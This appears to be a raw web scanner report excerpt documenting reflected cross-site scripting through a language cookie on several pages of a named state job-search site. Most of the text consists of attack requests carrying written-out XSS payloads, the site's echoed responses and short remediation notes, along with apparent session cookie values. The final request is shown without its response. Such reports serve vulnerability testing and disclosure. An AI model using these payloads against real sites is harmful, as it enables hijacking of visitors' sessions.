GET /ada/mn_forgotpass.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=ened9d5"><img%20src%3da%20onerror%3dalert(1)>d473d92771b; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:24 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ened9d5"><img src=a onerror=alert(1)>d473d92771b"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bceb4"%3balert(1)//60cf3b24c05 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as bceb4";alert(1)//60cf3b24c05 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_forgotpass.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=enbceb4"%3balert(1)//60cf3b24c05; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:26 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENBCEB4";ALERT(1)//60CF3B24C05\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b71b2"><img%20src%3da%20onerror%3dalert(1)>aa3836d3e47 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as b71b2"><img src=a onerror=alert(1)>aa3836d3e47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_login_fnc.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enb71b2"><img%20src%3da%20onerror%3dalert(1)>aa3836d3e47; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:21:00 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enb71b2"><img src=a onerror=alert(1)>aa3836d3e47"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93c3c"%3balert(1)//c80ab57b023 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 93c3c";alert(1)//c80ab57b023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_login_fnc.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en93c3c"%3balert(1)//c80ab57b023; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:21:12 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN93C3C";ALERT(1)//C80AB57B023\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e535"><img%20src%3da%20onerror%3dalert(1)>881020bcf9f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2e535"><img src=a onerror=alert(1)>881020bcf9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_offices_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en2e535"><img%20src%3da%20onerror%3dalert(1)>881020bcf9f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:03 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en2e535"><img src=a onerror=alert(1)>881020bcf9f"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload affbc"%3balert(1)//53c2f941734 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as affbc";alert(1)//53c2f941734 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_offices_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enaffbc"%3balert(1)//53c2f941734; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:12 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENAFFBC";ALERT(1)//53C2F941734\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9d3d"><img%20src%3da%20onerror%3dalert(1)>ac1fe6ffbf1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as f9d3d"><img src=a onerror=alert(1)>ac1fe6ffbf1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enf9d3d"><img%20src%3da%20onerror%3dalert(1)>ac1fe6ffbf1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:20:02 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enf9d3d"><img src=a onerror=alert(1)>ac1fe6ffbf1"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e2b8"%3balert(1)//fa1bc80a5c3 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 9e2b8";alert(1)//fa1bc80a5c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en9e2b8"%3balert(1)//fa1bc80a5c3; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:20:11 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN9E2B8";ALERT(1)//FA1BC80A5C3\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload decca"><img%20src%3da%20onerror%3dalert(1)>0dfd472147 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as decca"><img src=a onerror=alert(1)>0dfd472147 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_quicksearch_dsp.cfm?type=e&choice=1 HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=endecca"><img%20src%3da%20onerror%3dalert(1)>0dfd472147; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
